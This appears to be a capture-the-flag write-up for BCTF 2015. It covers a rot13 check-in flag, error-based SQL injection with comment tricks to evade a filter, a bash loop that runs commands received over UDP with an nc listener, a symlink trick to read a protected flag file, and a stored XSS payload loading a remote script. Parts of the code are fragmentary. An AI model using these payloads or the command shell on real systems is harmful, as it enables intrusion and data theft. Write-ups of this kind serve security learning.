Checkin 10

Desc: Please checkin at IRC

Bulletin board:

[BCTF 2015 has started. Check in flag: OPGS{jr1p0zr-g0-OPGS-2015_t00q-yhpx}. 

Rot13 decode:

OPGS{jr1p0zr-g0-OPGS-2015_t00q-yhpx} <--> BCTF{we1c0me-t0-BCTF-2015_g00d-luck}

Sqli_engineScore 200


geohot told me he has a lot of sql injection tricks. So I wrote a sql injection detection engine in defense.

Now you have a simple website protected by my engine, try to steal the admin’s password(not hash).

Username, Password ::: SQLi

  <form id="submit-form" class="form-group" action="/register" method="POST">
    <input type="text" placeholder="username" class="form-control" name="username"/>
    <input type="password" placeholder="password" class="form-control" name="password"/>
    <span class="input-icon fui-check-inverted"></span>
    <br />
    <div class="row">
      <div class="col-xs-3"> <button type="submit" class="btn btn-block btn-lg btn-primary">Register</button> </div>
      Already registered?<a href="/static/login.html">Click Here to Login</a>
    <br />

SQL Injection:

POST: username=admin&password=,'

error executing sql: insert into users (username, password) values ('admin', ','')

(1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '','')' at line 1")


username=admin\&password=,updatexml(1,(select password from users limit 1),1) or '

password contains SQL injection, IP recorded.

Bypass WAF:

username=admin\&password=,updatexml(1,(/*/*/select password from/*/*/users limit/*/*/1),1) or/*/*/'

(1105, "XPATH syntax error: '{h0w-d1d-y0u-fee1-l1ke-th3-sql1-'")

Substring right:

username=admin\&password=,updatexml(1,(/*/*/select right(password,33)/*/*/from/*/*/users limit/*/*/1),1) or/*/*/'

(1105, "XPATH syntax error: 'd-y0u-fee1-l1ke-th3-sql1-eng1ne}'")

String concatenation (FLAG):


Torrent_loverScore 233

Desc: A dog loves torrent.

We guess, Maybe the command execution, The program calls the system function? Because we have no other way. :-(


We have received req (404):

root@e:/rootkit# python -m SimpleHTTPServer
Serving HTTP on port 8000 ... - - [22/Mar/2015 13:44:39] "GET / HTTP/1.1" 200 - - - [22/Mar/2015 13:44:41] code 404, message File not found


exec 9<> /dev/udp/localhost/8088
[ $? -eq 1 ] && exit
echo "connect ok" >&9

while :
  a=`dd bs=200 count=1 <&9 2>/dev/null`
  if echo "$a"|grep "exit"; then break; fi
  echo `$a` >&9

exec 9>&-
exec 9<&-

nc -lu 8088

find use_me_to_read_flag and flag:

/var/www/flag/use_me_to_read_flag /var/www/flag/flag
>_ Permission denied

IDA, see _strstr “flag”:


ln -s /var/www/flag/flag /tmp/warning
/var/www/flag/use_me_to_read_flag /tmp/warning

Webchat 325


Websocket XSS? SQL Injection?


    function() {
        function connect() {
            $("#status").attr("class", "text-primary");
            var ws = new window.WebSocket('ws://' + + '/ws');
            ws.onopen = function() { $("#status").attr('class', 'text-success').text('Connected'); 
                $("#submit_btn").attr('disabled', false).click(function() {
                    $("#sendstatus").attr('class', 'text-primary').text('Sending...');
                    ws.send($("#i_nick").val() + ": " + $("#i_msg").val());
            ws.onclose = function() { $("#status").attr('class', 'text-danger').text('Disconnected'); setTimeout(connect, 5000);}
            ws.onerror = function() { $("#status").attr('class', 'text-danger').text('Failed to connect.'); }
            ws.onmessage = function(datad) {
                var data =;
                if (data[0] == 'm') $("#msg").html(data.substr(1) + "<br/>" +  $("#msg").html());
                if (data[0] == 's') { $("#i_msg").val(''); $("#sendstatus").attr('class', 'text-success').text('Message Sent');}
                if (data[0] == 'e') { $("#i_msg").val(''); $("#sendstatus").attr('class', 'text-danger').text('Message Rejected');}
  • ws:// mysql> select hex(‘<script src=></script>’); +————————————————————–+ | hex(‘<script src=></script>’) | +————————————————————–+ | 3C73637269707****3D687474703A2F2F7873732E6861636B7461736B2E6E65742F30544C73356E3F | +————————————————————–+ test: ‘),(0x3C73637269707****3D687474703A2F2F7873732E6861636B7461736B2E6E65742F30544C73356E3F),(‘

Page Content: Only admin in local network with correct password can review chat logs. But you’ve already had the flag you want,right?

➜  ~  echo -n "QkNURnt4c3NfaXNfbm90X3RoYXRfZGlmZmljdWx0X3JpZ2h0fQ==" | base64 -D